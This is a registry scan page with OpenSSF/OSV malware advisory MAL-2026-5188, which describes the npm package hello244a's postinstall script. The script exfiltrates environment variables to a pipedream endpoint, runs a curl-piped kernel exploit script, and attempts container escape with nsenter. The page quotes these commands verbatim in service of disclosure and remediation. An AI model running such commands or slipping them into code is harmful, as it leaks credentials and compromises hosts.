registry  /  hello244a  /  1.0.45

hello244a@1.0.45

OSV Malicious Advisory

scanned 3h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-5188 confirms this npm version as malicious. package.json declares a postinstall script that, on npm install, (1) enumerates process.env plus os.hostname(), os.platform(), os.arch(), and whoami output, base64-encodes the collected data, and issues an HTTP GET to a hardcoded pipedream request-bin at http://eodxy50gl486xrx.m.pipedream.net/, exfiltrating installer environment variables and host identity to an attacker-controlled endpoint over cleartext HTTP; (2)...

Advisory
MAL-2026-5188
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in hello244a (npm)
Details
package.json declares a postinstall script that, on npm install, (1) enumerates process.env plus os.hostname(), os.platform(), os.arch(), and whoami output, base64-encodes the collected data, and issues an HTTP GET to a hardcoded pipedream request-bin at http://eodxy50gl486xrx.m.pipedream.net/, exfiltrating installer environment variables and host identity to an attacker-controlled endpoint over cleartext HTTP; (2) on Linux, executes `curl -s https://raw.githubusercontent.com/Akabe1/akabe1.github.io/master/_posts/exploits/cve-2021-22555/exploit.sh | bash`, fetching and running an unpinned third-party shell script referencing a known Linux kernel local-privilege-escalation CVE; (3) attempts container/sandbox escape via `nsenter --mount=/proc/1/ns/mnt -- /bin/sh` on Linux and `docker exec` against running containers on Windows, with results reported back to the same pipedream endpoint. Behavior fires automatically on `npm install` with no user interaction. Installer harm is concrete: environment variables (which routinely contain credentials, tokens, and CI secrets) plus host identity are leaked to the attacker, and arbitrary attacker-controlled code executes in the installer's user context with privilege-escalation and container-escape attempts. ## Source: ghsa-malware (4a8d45ba8952a2231178f5d175eb173c678ad0fc41000370a58823f537734259) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (91844b3ed7a531e129cbdeef1746ccd1e8e981f74da00aa2a4aef2edf6b47dbf) The OpenSSF Package Analysis project identified 'hello244a' @ 1.0.12 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
Manifest
NoLicense
scanned 0 file(s), 0 B of source

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.postinstall = test
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = test
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg

Findings

1 High1 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
LowScripts Present
LowNo License